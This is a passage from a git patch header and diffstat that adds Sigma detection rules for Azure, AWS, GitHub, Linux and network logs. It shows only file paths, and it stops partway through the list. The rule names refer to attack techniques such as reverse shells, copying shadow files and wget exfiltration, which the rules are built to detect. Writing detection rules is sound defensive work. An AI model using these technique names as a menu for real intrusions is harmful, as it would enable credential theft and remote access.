From edfff4bc608a1959dfc9feb4f96bd02506a19a09 Mon Sep 17 00:00:00 2001 From: Subhobrata Dey Date: Tue, 19 Mar 2024 15:17:46 -0700 Subject: [PATCH] add latest sigma rules (#942) Signed-off-by: Subhobrata Dey --- ...d_secops_ca_policy_removedby_bad_actor.yml | 24 ++++ ...d_secops_ca_policy_updatedby_bad_actor.yml | 24 ++++ ...secops_new_ca_policy_addedby_bad_actor.yml | 22 ++++ .../azure_aadhybridhealth_adfs_new_server.yml | 37 +++--- ...re_aadhybridhealth_adfs_service_delete.yml | 37 +++--- .../rules/azure/azure_account_lockout.yml | 29 ++--- .../azure_ad_account_created_deleted.yml | 25 ++++ .../azure/azure_ad_auth_failure_increase.yml | 22 ++++ .../azure/azure_ad_auth_sucess_increase.yml | 23 ++++ ...mportant_apps_using_single_factor_auth.yml | 23 ++++ ...om_countries_you_do_not_operate_out_of.yml | 25 ++++ .../azure/azure_ad_azurehound_discovery.yml | 23 ++++ .../azure_ad_bitlocker_key_retrieval.yml | 22 ++++ ...evice_registration_or_join_without_mfa.yml | 24 ++++ ..._ad_device_registration_policy_changes.yml | 23 ++++ ...om_countries_you_do_not_operate_out_of.yml | 25 ++++ ...ted_to_tenant_by_non_approved_inviters.yml | 24 ++++ ...re_ad_only_single_factor_auth_required.yml | 24 ++++ ..._singlefactorauth_from_unknown_devices.yml | 24 ++++ ..._ad_sign_ins_from_noncompliant_devices.yml | 21 ++++ ...azure_ad_sign_ins_from_unknown_devices.yml | 25 ++++ ...ure_ad_suspicious_signin_bypassing_mfa.yml | 28 +++++ .../azure_ad_user_added_to_admin_role.yml | 28 +++++ ...e_ad_users_added_to_device_admin_roles.yml | 28 +++++ .../azure/azure_app_appid_uri_changes.yml | 32 ++--- .../azure/azure_app_credential_added.yml | 30 ++--- .../azure_app_credential_modification.yml | 23 ++-- ...re_app_delegated_permissions_all_users.yml | 21 ++++ .../azure_app_device_code_authentication.yml | 36 +++--- .../azure/azure_app_end_user_consent.yml | 21 ++++ .../azure_app_end_user_consent_blocked.yml | 21 ++++ .../rules/azure/azure_app_owner_added.yml | 26 ++--- .../azure/azure_app_permissions_msft.yml | 23 ++++ .../azure_app_privileged_permissions.yml | 26 +++++ .../rules/azure/azure_app_role_added.yml | 25 ++++ .../azure/azure_app_ropc_authentication.yml | 34 +++--- .../azure/azure_app_uri_modifications.yml | 34 +++--- .../rules/azure/azure_application_deleted.yml | 25 ++-- ...pplication_gateway_modified_or_deleted.yml | 25 ++-- ...ion_security_group_modified_or_deleted.yml | 25 ++-- .../azure/azure_blocked_account_attempt.yml | 14 +-- .../azure_change_to_authentication_method.yml | 35 +++--- .../azure_conditional_access_failure.yml | 14 ++- ..._container_registry_created_or_deleted.yml | 23 ++-- ...creating_number_of_resources_detection.yml | 25 ++-- ..._device_no_longer_managed_or_compliant.yml | 19 +-- ...e_or_configuration_modified_or_deleted.yml | 25 ++-- .../azure_dns_zone_modified_or_deleted.yml | 30 ++--- .../rules/azure/azure_federation_modified.yml | 26 ++--- .../azure_firewall_modified_or_deleted.yml | 25 ++-- ...ll_rule_collection_modified_or_deleted.yml | 25 ++-- .../azure_granting_permission_detection.yml | 23 ++-- ...re_group_user_addition_ca_modification.yml | 23 ++++ ...ure_group_user_removal_ca_modification.yml | 23 ++++ .../azure/azure_guest_invite_failure.yml | 23 ++++ .../rules/azure/azure_guest_to_member.yml | 24 ++++ ...re_identity_protection_anomalous_token.yml | 22 ++++ ...ure_identity_protection_anomalous_user.yml | 22 ++++ ...ntity_protection_anonymous_ip_activity.yml | 25 ++++ ...entity_protection_anonymous_ip_address.yml | 22 ++++ ...re_identity_protection_atypical_travel.yml | 25 ++++ ..._identity_protection_impossible_travel.yml | 25 ++++ ...ntity_protection_inbox_forwarding_rule.yml | 22 ++++ ...identity_protection_inbox_manipulation.yml | 22 ++++ ...identity_protection_leaked_credentials.yml | 22 ++++ ...entity_protection_malicious_ip_address.yml | 22 ++++ ...ection_malicious_ip_address_suspicious.yml | 22 ++++ ..._identity_protection_malware_linked_ip.yml | 22 ++++ ..._identity_protection_new_coutry_region.yml | 25 ++++ ...ure_identity_protection_password_spray.yml | 22 ++++ .../azure_identity_protection_prt_access.yml | 22 ++++ ...identity_protection_suspicious_browser.yml | 25 ++++ ...azure_identity_protection_threat_intel.yml | 26 +++++ ...entity_protection_token_issuer_anomaly.yml | 22 ++++ ..._identity_protection_unfamilar_sign_in.yml | 25 ++++ ...azure_keyvault_key_modified_or_deleted.yml | 31 ++--- .../azure_keyvault_modified_or_deleted.yml | 31 ++--- ...e_keyvault_secrets_modified_or_deleted.yml | 31 ++--- .../azure_kubernetes_admission_controller.yml | 50 ++++---- ..._kubernetes_cluster_created_or_deleted.yml | 23 ++-- .../rules/azure/azure_kubernetes_cronjob.yml | 42 +++---- .../azure/azure_kubernetes_events_deleted.yml | 25 ++-- ...azure_kubernetes_network_policy_change.yml | 25 ++-- .../azure/azure_kubernetes_pods_deleted.yml | 27 ++--- .../azure/azure_kubernetes_role_access.yml | 23 ++-- ...rnetes_rolebinding_modified_or_deleted.yml | 25 ++-- ...ernetes_secret_or_config_object_access.yml | 21 ++-- ...es_service_account_modified_or_deleted.yml | 24 ++-- .../azure_legacy_authentication_protocols.yml | 32 +++++ .../azure/azure_login_to_disabled_account.yml | 31 ++--- .../rules/azure/azure_mfa_denies.yml | 33 +++--- .../rules/azure/azure_mfa_disabled.yml | 13 +-- .../rules/azure/azure_mfa_interrupted.yml | 42 ++++--- ...rk_firewall_policy_modified_or_deleted.yml | 25 ++-- ...work_firewall_rule_modified_or_deleted.yml | 23 ++-- ...re_network_p2s_vpn_modified_or_deleted.yml | 23 ++-- ...e_network_security_modified_or_deleted.yml | 23 ++-- ...ork_virtual_device_modified_or_deleted.yml | 27 +++-- .../azure/azure_new_cloudshell_created.yml | 23 ++-- ..._from_application_or_service_principal.yml | 23 ++-- .../rules/azure/azure_pim_account_stale.yml | 22 ++++ .../azure_pim_activation_approve_deny.yml | 21 ++++ .../rules/azure/azure_pim_alerts_disabled.yml | 22 ++++ .../rules/azure/azure_pim_change_settings.yml | 22 ++++ .../rules/azure/azure_pim_invalid_license.yml | 22 ++++ ...azure_pim_role_assigned_outside_of_pim.yml | 22 ++++ .../azure_pim_role_frequent_activation.yml | 22 ++++ .../azure/azure_pim_role_no_mfa_required.yml | 22 ++++ .../rules/azure/azure_pim_role_not_used.yml | 22 ++++ .../azure_pim_too_many_global_admins.yml | 22 ++++ .../azure_priviledged_role_assignment_add.yml | 24 ++++ ...riviledged_role_assignment_bulk_change.yml | 23 ++++ .../azure_privileged_account_creation.yml | 26 +++++ .../rules/azure/azure_rare_operations.yml | 34 +++--- .../azure/azure_service_principal_created.yml | 23 ++-- .../azure/azure_service_principal_removed.yml | 23 ++-- ...permissions_elevation_via_activitylogs.yml | 32 ++--- ...on_permissions_elevation_via_auditlogs.yml | 34 +++--- .../azure/azure_suppression_rule_created.yml | 25 ++-- .../resources/rules/azure/azure_tap_added.yml | 22 ++++ ...re_unusual_authentication_interruption.yml | 43 +++---- ...er_login_blocked_by_conditional_access.yml | 33 +++--- .../azure/azure_user_password_change.yml | 27 +++++ ...thenticating_to_other_azure_ad_tenants.yml | 24 ++++ ...re_virtual_network_modified_or_deleted.yml | 25 ++-- ...ure_vpn_connection_modified_or_deleted.yml | 23 ++-- .../aws_attached_malicious_lambda_layer.yml | 23 ++-- .../aws_cloudtrail_disable_logging.yml | 14 +-- .../aws_config_disable_recording.yml | 22 ++-- .../cloudtrail/aws_console_getsignintoken.yml | 28 +++++ .../rules/cloudtrail/aws_delete_identity.yml | 23 ++++ .../aws_disable_bucket_versioning.yml | 23 ++++ .../cloudtrail/aws_ec2_disable_encryption.yml | 8 +- .../aws_ec2_startup_script_change.yml | 16 +-- .../cloudtrail/aws_ec2_vm_export_failure.yml | 42 +++---- ...cs_task_definition_cred_endpoint_query.yml | 31 +++++ .../aws_efs_fileshare_modified_or_deleted.yml | 16 ++- ...fs_fileshare_mount_modified_or_deleted.yml | 13 ++- .../aws_eks_cluster_created_or_deleted.yml | 21 ++-- ...aws_elasticache_security_group_created.yml | 22 ++-- ...che_security_group_modified_or_deleted.yml | 20 ++-- .../rules/cloudtrail/aws_enum_buckets.yml | 30 +++++ .../cloudtrail/aws_guardduty_disruption.yml | 14 +-- .../aws_iam_backdoor_users_keys.yml | 19 +-- ...ws_iam_s3browser_loginprofile_creation.yml | 27 +++++ ...er_templated_s3_bucket_policy_creation.yml | 30 +++++ ...m_s3browser_user_or_accesskey_creation.yml | 27 +++++ ...ssed_role_to_glue_development_endpoint.yml | 31 +++-- .../aws_rds_change_master_password.yml | 16 +-- .../cloudtrail/aws_rds_public_db_restore.yml | 14 +-- .../cloudtrail/aws_root_account_usage.yml | 30 ++--- ...te_53_domain_transferred_lock_disabled.yml | 21 ++-- ..._domain_transferred_to_another_account.yml | 17 +-- .../aws_s3_data_management_tampering.yml | 34 +++--- .../aws_securityhub_finding_evasion.yml | 12 +- .../aws_snapshot_backup_exfiltration.yml | 25 ++-- .../rules/cloudtrail/aws_sso_idp_change.yml | 32 +++++ .../cloudtrail/aws_sts_assumerole_misuse.yml | 22 ++-- .../aws_sts_getsessiontoken_misuse.yml | 23 ++-- .../cloudtrail/aws_susp_saml_activity.yml | 37 +++--- .../cloudtrail/aws_update_login_profile.yml | 17 +-- .../github/github_delete_action_invoked.yml | 11 +- ...github_disable_high_risk_configuration.yml | 18 +-- ...d_outdated_dependency_or_vulnerability.yml | 18 +-- .../rules/github/github_new_org_member.yml | 16 +-- .../github/github_new_secret_created.yml | 15 +-- .../github_outside_collaborator_detected.yml | 11 +- ...github_push_protection_bypass_detected.yml | 23 ++++ .../github_push_protection_disabled.yml | 30 +++++ ...ithub_secret_scanning_feature_disabled.yml | 26 +++++ ...ub_self_hosted_runner_changes_detected.yml | 18 +-- ...ace_application_access_levels_modified.yml | 28 +++++ .../gcp_gworkspace_application_removed.yml | 26 +++++ ...p_gworkspace_granted_domain_api_access.yml | 25 ++++ .../gcp_gworkspace_mfa_disabled.yml | 28 +++++ ...cp_gworkspace_role_modified_or_deleted.yml | 27 +++++ .../gcp_gworkspace_role_privilege_deleted.yml | 24 ++++ ...orkspace_user_granted_admin_privileges.yml | 26 +++++ .../auditd/lnx_auditd_alter_bash_profile.yml | 35 ------ .../linux/auditd/lnx_auditd_audio_capture.yml | 35 +++--- .../lnx_auditd_auditing_config_change.yml | 38 +++--- .../auditd/lnx_auditd_binary_padding.yml | 48 ++++---- .../lnx_auditd_bpfdoor_file_accessed.yml | 27 +++++ .../lnx_auditd_bpfdoor_port_redirect.yml | 30 +++++ .../lnx_auditd_capabilities_discovery.yml | 43 +++---- .../lnx_auditd_change_file_time_attr.yml | 42 +++---- .../lnx_auditd_chattr_immutable_removal.yml | 30 ++--- .../lnx_auditd_clipboard_collection.yml | 29 ++--- .../lnx_auditd_clipboard_image_collection.yml | 51 ++++---- .../linux/auditd/lnx_auditd_coinminer.yml | 7 +- .../auditd/lnx_auditd_create_account.yml | 30 ++--- ...itd_cve_2021_3156_sudo_buffer_overflow.yml | 42 ------- ...21_3156_sudo_buffer_overflow_brutforce.yml | 29 ----- .../linux/auditd/lnx_auditd_cve_2021_4034.yml | 28 ----- .../auditd/lnx_auditd_data_compressed.yml | 42 +++---- .../auditd/lnx_auditd_data_exfil_wget.yml | 36 +++--- .../auditd/lnx_auditd_dd_delete_file.yml | 11 +- .../lnx_auditd_disable_system_firewall.yml | 35 +++--- .../lnx_auditd_file_or_folder_permissions.yml | 28 ++--- .../auditd/lnx_auditd_find_cred_in_files.yml | 33 +++--- .../lnx_auditd_hidden_binary_execution.yml | 31 +++++ .../lnx_auditd_hidden_files_directories.yml | 48 ++++---- ..._auditd_hidden_zip_files_steganography.yml | 42 +++---- .../lnx_auditd_keylogging_with_pam_d.yml | 48 ++++---- .../auditd/lnx_auditd_ld_so_preload_mod.yml | 26 ++--- .../auditd/lnx_auditd_load_module_insmod.yml | 23 ++-- .../lnx_auditd_logging_config_change.yml | 36 +++--- .../auditd/lnx_auditd_masquerading_crond.yml | 33 +++--- .../lnx_auditd_modify_system_firewall.yml | 37 ++++++ .../lnx_auditd_network_service_scanning.yml | 42 +++---- .../auditd/lnx_auditd_network_sniffing.yml | 48 ++++---- ..._scx_runasprovider_executeshellcommand.yml | 21 ++-- .../lnx_auditd_password_policy_discovery.yml | 55 +++++---- .../auditd/lnx_auditd_pers_systemd_reload.yml | 33 +++--- .../lnx_auditd_screencapture_import.yml | 61 +++++----- .../auditd/lnx_auditd_screencaputre_xwd.yml | 44 +++---- .../lnx_auditd_split_file_into_pieces.yml | 28 ++--- ...nx_auditd_steghide_embed_steganography.yml | 46 ++++---- ..._auditd_steghide_extract_steganography.yml | 40 +++---- .../auditd/lnx_auditd_susp_c2_commands.yml | 25 ++-- .../linux/auditd/lnx_auditd_susp_cmds.yml | 52 ++++----- .../auditd/lnx_auditd_susp_exe_folders.yml | 60 +++++----- .../lnx_auditd_susp_histfile_operations.yml | 52 ++++----- .../lnx_auditd_system_info_discovery.yml | 64 ++++++---- .../lnx_auditd_system_info_discovery2.yml | 30 ++--- .../lnx_auditd_system_shutdown_reboot.yml | 50 ++++---- .../lnx_auditd_systemd_service_creation.yml | 39 +++---- ..._unix_shell_configuration_modification.yml | 53 +++++++++ ...d_unzip_hidden_zip_files_steganography.yml | 38 +++--- .../auditd/lnx_auditd_user_discovery.yml | 30 ++--- .../rules/linux/auditd/lnx_auditd_web_rce.yml | 18 +-- ...auth_pwnkit_local_privilege_escalation.yml | 25 ++++ .../clamav/lnx_clamav_relevant_message.yml} | 12 +- .../lnx_cron_crontab_file_modification.yml} | 15 ++- .../lnx_guacamole_susp_guacamole.yml | 22 ++++ .../builtin/lnx_apt_equationgroup_lnx.yml | 82 +++++++++++++ .../linux/builtin/lnx_buffer_overflows.yml | 12 +- .../rules/linux/builtin/lnx_clear_syslog.yml | 9 +- .../rules/linux/builtin/lnx_file_copy.yml | 12 +- .../builtin/lnx_ldso_preload_injection.yml | 15 +-- ...nimbuspwn_privilege_escalation_exploit.yml | 30 ++--- .../lnx_potential_susp_ebpf_activity.yml | 21 ++++ .../builtin/lnx_privileged_user_creation.yml | 34 ++++++ .../linux/builtin/lnx_proxy_connection.yml | 21 ---- .../lnx_pwnkit_local_privilege_escalation.yml | 23 ---- .../rules/linux/builtin/lnx_setgid_setuid.yml | 25 ---- .../builtin/lnx_shell_clear_cmd_history.yml | 31 +++-- .../linux/builtin/lnx_shell_priv_esc_prep.yml | 71 ------------ .../linux/builtin/lnx_shell_susp_commands.yml | 88 +++++++------- .../builtin/lnx_shell_susp_log_entries.yml | 26 +++-- .../builtin/lnx_shell_susp_rev_shells.yml | 68 +++++------ .../rules/linux/builtin/lnx_shellshock.yml | 14 +-- .../builtin/lnx_space_after_filename_.yml | 22 ++-- .../rules/linux/builtin/lnx_susp_dev_tcp.yml | 44 +++---- .../rules/linux/builtin/lnx_susp_jexboss.yml | 26 ++--- .../linux/builtin/lnx_symlink_etc_passwd.yml | 22 ++-- .../sshd/lnx_sshd_ssh_cve_2018_15473.yml | 22 ++++ .../linux/builtin/sshd/lnx_sshd_susp_ssh.yml | 33 ++++++ .../lnx_sudo_cve_2019_14287_user.yml | 16 +-- ...yslog_security_tools_disabling_syslog.yml} | 20 ++-- .../builtin/syslog/lnx_syslog_susp_named.yml | 24 ++++ .../vsftpd/lnx_vsftpd_susp_error_messages.yml | 38 ++++++ .../file_create_lnx_cron_files.yml | 32 ----- .../file_event_lnx_doas_conf_creation.yml} | 3 +- .../file_event_lnx_persistence_cron_files.yml | 33 ++++++ ...le_event_lnx_persistence_sudoers_files.yml | 22 ++++ ...p_shell_script_under_profile_directory.yml | 27 +++++ ...ent_lnx_triple_cross_rootkit_lock_file.yml | 21 ++++ ...t_lnx_triple_cross_rootkit_persistence.yml | 24 ++++ ...vent_lnx_wget_download_file_in_tmp_dir.yml | 27 +++++ .../modsecurity/modsec_mulitple_blocks.yml | 23 ---- ..._connection_lnx_back_connect_shell_dev.yml | 30 ++--- ...onnection_lnx_crypto_mining_indicators.yml | 7 +- .../net_connection_lnx_ngrok_tunnel.yml | 35 ++++++ .../linux/other/lnx_ssh_cve_2018_15473.yml | 22 ---- .../lnx_susp_failed_logons_single_source.yml | 25 ---- .../rules/linux/other/lnx_susp_guacamole.yml | 22 ---- .../rules/linux/other/lnx_susp_named.yml | 24 ---- .../rules/linux/other/lnx_susp_ssh.yml | 33 ------ .../rules/linux/other/lnx_susp_vsftp.yml | 38 ------ .../proc_creation_lnx_at_command.yml | 19 +-- .../proc_creation_lnx_base64_decode.yml | 24 ++-- .../proc_creation_lnx_base64_execution.yml | 34 ++++++ .../proc_creation_lnx_base64_shebang_cli.yml | 27 +++++ ...oc_creation_lnx_bash_interactive_shell.yml | 23 ++++ ...creation_lnx_bpf_kprob_tracing_enabled.yml | 28 +++++ ...ation_lnx_bpftrace_unsafe_option_usage.yml | 28 ++--- .../proc_creation_lnx_capa_discovery.yml | 25 ++++ .../proc_creation_lnx_cat_sudoers.yml | 32 ++--- ..._creation_lnx_chattr_immutable_removal.yml | 25 ++++ .../proc_creation_lnx_clear_logs.yml | 14 ++- .../proc_creation_lnx_clear_syslog.yml | 45 ++++---- ...proc_creation_lnx_clipboard_collection.yml | 43 ++++--- ...c_creation_lnx_cp_passwd_or_shadow_tmp.yml | 28 +++++ .../proc_creation_lnx_crontab_enumeration.yml | 25 ++++ .../proc_creation_lnx_crontab_removal.yml | 23 ++++ .../proc_creation_lnx_crypto_mining.yml | 62 +++++----- .../proc_creation_lnx_curl_usage.yml | 22 ++++ ...nx_cve_2022_26134_atlassian_confluence.yml | 8 +- ...22_33891_spark_shell_command_injection.yml | 27 +++++ .../proc_creation_lnx_dd_file_overwrite.yml | 37 +++--- ...proc_creation_lnx_dd_process_injection.yml | 26 +++++ .../proc_creation_lnx_disable_ufw.yml | 28 +++++ .../proc_creation_lnx_doas_execution.yml | 2 +- ..._creation_lnx_esxcli_network_discovery.yml | 29 +++++ ...ion_lnx_esxcli_permission_change_admin.yml | 25 ++++ ..._creation_lnx_esxcli_storage_discovery.yml | 30 +++++ ...eation_lnx_esxcli_syslog_config_change.yml | 28 +++++ ...c_creation_lnx_esxcli_system_discovery.yml | 28 +++++ ...ation_lnx_esxcli_user_account_creation.yml | 25 ++++ .../proc_creation_lnx_esxcli_vm_discovery.yml | 27 +++++ .../proc_creation_lnx_esxcli_vm_kill.yml | 26 +++++ ...roc_creation_lnx_esxcli_vsan_discovery.yml | 30 +++++ ...ation_lnx_file_and_directory_discovery.yml | 42 +++---- .../proc_creation_lnx_file_deletion.yml | 14 ++- ...oc_creation_lnx_grep_os_arch_discovery.yml | 33 ++++++ .../proc_creation_lnx_groupdel.yml | 24 ++++ .../proc_creation_lnx_gtfobin_apt.yml | 25 ++++ .../proc_creation_lnx_gtfobin_vim.yml | 39 +++++++ ..._creation_lnx_install_root_certificate.yml | 30 ++--- ...eation_lnx_install_suspicioua_packages.yml | 47 ++++++++ .../proc_creation_lnx_iptables_flush_ufw.yml | 41 +++++++ .../proc_creation_lnx_kill_process.yml | 25 ++++ .../proc_creation_lnx_local_account.yml | 57 ++++----- .../proc_creation_lnx_local_groups.yml | 38 +++--- ..._malware_gobrat_grep_payload_discovery.yml | 28 +++++ ...reation_lnx_mkfifo_named_pipe_creation.yml | 21 ++++ ...fifo_named_pipe_creation_susp_location.yml | 26 +++++ .../proc_creation_lnx_mount_hidepid.yml | 26 +++++ ...proc_creation_lnx_netcat_reverse_shell.yml | 59 ++++++++++ ..._creation_lnx_network_service_scanning.yml | 31 ----- .../proc_creation_lnx_nohup.yml | 25 ++-- ...proc_creation_lnx_nohup_susp_execution.yml | 27 +++++ ...omigod_scx_runasprovider_executescript.yml | 25 ++-- ..._scx_runasprovider_executeshellcommand.yml | 23 ++-- .../proc_creation_lnx_perl_reverse_shell.yml | 31 +++++ .../proc_creation_lnx_php_reverse_shell.yml | 36 ++++++ .../proc_creation_lnx_process_discovery.yml | 20 ++-- .../proc_creation_lnx_proxy_connection.yml | 24 ++++ .../proc_creation_lnx_python_pty_spawn.yml | 28 +++-- ...proc_creation_lnx_python_reverse_shell.yml | 30 +++++ ...s_tools_teamviewer_incoming_connection.yml | 30 +++++ ...c_creation_lnx_remote_system_discovery.yml | 70 +++++------ .../proc_creation_lnx_remove_package.yml | 42 +++++++ .../proc_creation_lnx_ruby_reverse_shell.yml | 34 ++++++ ...oc_creation_lnx_schedule_task_job_cron.yml | 32 ++--- ...eation_lnx_security_software_discovery.yml | 50 ++++---- ..._creation_lnx_security_tools_disabling.yml | 56 ++++----- ...creation_lnx_services_stop_and_disable.yml | 26 +++++ .../proc_creation_lnx_setgid_setuid.yml | 27 +++++ .../proc_creation_lnx_ssm_agent_abuse.yml | 29 +++++ ...proc_creation_lnx_sudo_cve_2019_14287.yml} | 19 +-- ...oc_creation_lnx_susp_chmod_directories.yml | 36 +++--- ...lnx_susp_container_residence_discovery.yml | 38 ++++++ ...proc_creation_lnx_susp_curl_fileupload.yml | 41 +++++++ .../proc_creation_lnx_susp_curl_useragent.yml | 28 +++++ ...proc_creation_lnx_susp_dockerenv_recon.yml | 32 +++++ ...creation_lnx_susp_execution_tmp_folder.yml | 24 ++++ .../proc_creation_lnx_susp_find_execution.yml | 33 ++++++ .../proc_creation_lnx_susp_git_clone.yml | 41 +++++++ .../proc_creation_lnx_susp_history_delete.yml | 42 ++++--- .../proc_creation_lnx_susp_history_recon.yml | 43 ++++--- .../proc_creation_lnx_susp_hktl_execution.yml | 99 ++++++++++++++++ .../proc_creation_lnx_susp_inod_listing.yml | 28 +++++ ...roc_creation_lnx_susp_interactive_bash.yml | 47 ++++---- .../proc_creation_lnx_susp_java_children.yml | 6 +- ...n_lnx_susp_network_utilities_execution.yml | 42 +++++++ .../proc_creation_lnx_susp_pipe_shell.yml | 39 ++++--- ...roc_creation_lnx_susp_recon_indicators.yml | 32 ++--- ...reation_lnx_susp_sensitive_file_access.yml | 50 ++++++++ ...l_child_process_from_parent_tmp_folder.yml | 31 +++++ ...p_shell_script_exec_from_susp_location.yml | 35 ++++++ ...roc_creation_lnx_system_info_discovery.yml | 18 +-- ...x_system_network_connections_discovery.yml | 39 ++++--- ..._creation_lnx_system_network_discovery.yml | 46 ++++---- .../proc_creation_lnx_touch_susp.yml | 24 ++++ ...lnx_triple_cross_rootkit_execve_hijack.yml | 22 ++++ ...ation_lnx_triple_cross_rootkit_install.yml | 27 +++++ .../proc_creation_lnx_userdel.yml | 24 ++++ .../proc_creation_lnx_usermod_susp_group.yml | 25 ++++ .../proc_creation_lnx_webshell_detection.yml | 68 ++++++----- ...lnx_wget_download_suspicious_directory.yml | 29 +++++ .../proc_creation_lnx_xterm_reverse_shell.yml | 24 ++++ .../rules/m365/microsoft365_disabling_mfa.yml | 21 ++++ ...ft365_new_federated_domain_added_audit.yml | 29 +++++ ...65_new_federated_domain_added_exchange.yml | 30 +++++ .../m365/microsoft365_pst_export_alert.yml | 2 +- ...alert_using_new_compliancesearchaction.yml | 2 +- .../cisco/aaa/cisco_cli_clear_logs.yml | 32 +++-- .../cisco/aaa/cisco_cli_collect_data.yml | 45 ++++---- .../cisco/aaa/cisco_cli_crypto_actions.yml | 37 +++--- .../cisco/aaa/cisco_cli_disable_logging.yml | 35 +++--- .../network/cisco/aaa/cisco_cli_discovery.yml | 65 +++++------ .../rules/network/cisco/aaa/cisco_cli_dos.yml | 31 +++-- .../cisco/aaa/cisco_cli_file_deletion.yml | 33 +++--- .../cisco/aaa/cisco_cli_input_capture.yml | 27 +++-- .../cisco/aaa/cisco_cli_local_accounts.yml | 27 +++-- .../cisco/aaa/cisco_cli_modify_config.yml | 45 ++++---- .../cisco/aaa/cisco_cli_moving_data.yml | 43 ++++--- .../network/cisco/aaa/cisco_cli_net_sniff.yml | 29 +++-- .../cisco/bgp/cisco_bgp_md5_auth_failed.yml | 35 ++++++ .../cisco/ldp/cisco_ldp_md5_auth_failed.yml | 35 ++++++ .../net_firewall_cleartext_protocols.yml | 89 ++++++++++++++ .../zeek_dce_rpc_mitre_bzar_execution.yml | 84 +++++++------- .../zeek_dce_rpc_mitre_bzar_persistence.yml | 56 ++++----- ...rpc_potential_petit_potam_efs_rpc_call.yml | 19 ++- ...pc_printnightmare_print_driver_install.yml | 19 +-- .../zeek_dce_rpc_smb_spoolss_named_pipe.yml | 10 +- ...zeek_default_cobalt_strike_certificate.yml | 22 ++-- .../network/zeek/zeek_dns_mining_pools.yml | 24 ++-- .../rules/network/zeek/zeek_dns_nkn.yml | 28 ++--- .../network/zeek/zeek_dns_susp_zbit_flag.yml | 109 ++++++++---------- .../rules/network/zeek/zeek_dns_torproxy.yml | 16 ++- ...k_http_executable_download_from_webdav.yml | 32 ++--- .../zeek/zeek_http_omigod_no_auth_rce.yml | 27 +++-- .../zeek/zeek_http_webdav_put_request.yml | 38 +++--- .../network/zeek/zeek_rdp_public_listener.yml | 50 +++----- .../zeek_smb_converted_win_atsvc_task.yml | 37 +++--- ..._smb_converted_win_impacket_secretdump.yml | 34 +++--- .../zeek_smb_converted_win_lm_namedpipe.yml | 64 +++++----- .../zeek_smb_converted_win_susp_psexec.yml | 46 ++++---- ...verted_win_susp_raccess_sensitive_fext.yml | 54 +++++---- ...ransferring_files_with_credential_data.yml | 45 ++++---- .../network/zeek/zeek_susp_kerberos_rc4.yml | 28 ++--- .../mapper/MapperRestApiIT.java | 4 +- 425 files changed, 8618 insertions(+), 3959 deletions(-) create mode 100644 src/main/resources/rules/azure/azure_aad_secops_ca_policy_removedby_bad_actor.yml create mode 100644 src/main/resources/rules/azure/azure_aad_secops_ca_policy_updatedby_bad_actor.yml create mode 100644 src/main/resources/rules/azure/azure_aad_secops_new_ca_policy_addedby_bad_actor.yml create mode 100644 src/main/resources/rules/azure/azure_ad_account_created_deleted.yml create mode 100644 src/main/resources/rules/azure/azure_ad_auth_failure_increase.yml create mode 100644 src/main/resources/rules/azure/azure_ad_auth_sucess_increase.yml create mode 100644 src/main/resources/rules/azure/azure_ad_auth_to_important_apps_using_single_factor_auth.yml create mode 100644 src/main/resources/rules/azure/azure_ad_authentications_from_countries_you_do_not_operate_out_of.yml create mode 100644 src/main/resources/rules/azure/azure_ad_azurehound_discovery.yml create mode 100644 src/main/resources/rules/azure/azure_ad_bitlocker_key_retrieval.yml create mode 100644 src/main/resources/rules/azure/azure_ad_device_registration_or_join_without_mfa.yml create mode 100644 src/main/resources/rules/azure/azure_ad_device_registration_policy_changes.yml create mode 100644 src/main/resources/rules/azure/azure_ad_failed_auth_from_countries_you_do_not_operate_out_of.yml create mode 100644 src/main/resources/rules/azure/azure_ad_guest_users_invited_to_tenant_by_non_approved_inviters.yml create mode 100644 src/main/resources/rules/azure/azure_ad_only_single_factor_auth_required.yml create mode 100644 src/main/resources/rules/azure/azure_ad_risky_sign_ins_with_singlefactorauth_from_unknown_devices.yml create mode 100644 src/main/resources/rules/azure/azure_ad_sign_ins_from_noncompliant_devices.yml create mode 100644 src/main/resources/rules/azure/azure_ad_sign_ins_from_unknown_devices.yml create mode 100644 src/main/resources/rules/azure/azure_ad_suspicious_signin_bypassing_mfa.yml create mode 100644 src/main/resources/rules/azure/azure_ad_user_added_to_admin_role.yml create mode 100644 src/main/resources/rules/azure/azure_ad_users_added_to_device_admin_roles.yml create mode 100644 src/main/resources/rules/azure/azure_app_delegated_permissions_all_users.yml create mode 100644 src/main/resources/rules/azure/azure_app_end_user_consent.yml create mode 100644 src/main/resources/rules/azure/azure_app_end_user_consent_blocked.yml create mode 100644 src/main/resources/rules/azure/azure_app_permissions_msft.yml create mode 100644 src/main/resources/rules/azure/azure_app_privileged_permissions.yml create mode 100644 src/main/resources/rules/azure/azure_app_role_added.yml create mode 100644 src/main/resources/rules/azure/azure_group_user_addition_ca_modification.yml create mode 100644 src/main/resources/rules/azure/azure_group_user_removal_ca_modification.yml create mode 100644 src/main/resources/rules/azure/azure_guest_invite_failure.yml create mode 100644 src/main/resources/rules/azure/azure_guest_to_member.yml create mode 100644 src/main/resources/rules/azure/azure_identity_protection_anomalous_token.yml create mode 100644 src/main/resources/rules/azure/azure_identity_protection_anomalous_user.yml create mode 100644 src/main/resources/rules/azure/azure_identity_protection_anonymous_ip_activity.yml create mode 100644 src/main/resources/rules/azure/azure_identity_protection_anonymous_ip_address.yml create mode 100644 src/main/resources/rules/azure/azure_identity_protection_atypical_travel.yml create mode 100644 src/main/resources/rules/azure/azure_identity_protection_impossible_travel.yml create mode 100644 src/main/resources/rules/azure/azure_identity_protection_inbox_forwarding_rule.yml create mode 100644 src/main/resources/rules/azure/azure_identity_protection_inbox_manipulation.yml create mode 100644 src/main/resources/rules/azure/azure_identity_protection_leaked_credentials.yml create mode 100644 src/main/resources/rules/azure/azure_identity_protection_malicious_ip_address.yml create mode 100644 src/main/resources/rules/azure/azure_identity_protection_malicious_ip_address_suspicious.yml create mode 100644 src/main/resources/rules/azure/azure_identity_protection_malware_linked_ip.yml create mode 100644 src/main/resources/rules/azure/azure_identity_protection_new_coutry_region.yml create mode 100644 src/main/resources/rules/azure/azure_identity_protection_password_spray.yml create mode 100644 src/main/resources/rules/azure/azure_identity_protection_prt_access.yml create mode 100644 src/main/resources/rules/azure/azure_identity_protection_suspicious_browser.yml create mode 100644 src/main/resources/rules/azure/azure_identity_protection_threat_intel.yml create mode 100644 src/main/resources/rules/azure/azure_identity_protection_token_issuer_anomaly.yml create mode 100644 src/main/resources/rules/azure/azure_identity_protection_unfamilar_sign_in.yml create mode 100644 src/main/resources/rules/azure/azure_legacy_authentication_protocols.yml create mode 100644 